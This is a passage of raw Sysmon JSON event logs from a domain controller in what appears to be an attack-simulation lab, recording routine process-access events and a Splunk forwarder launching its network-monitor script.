C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.549\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nTargetProcessId: 2660\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.549","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","TargetProcessId":"2660","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.660\r\nProcessGuid: {41C8662E-1F78-5F25-0000-001090FE0300}\r\nProcessId: 3716\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.660","ProcessGuid":"{41C8662E-1F78-5F25-0000-001090FE0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 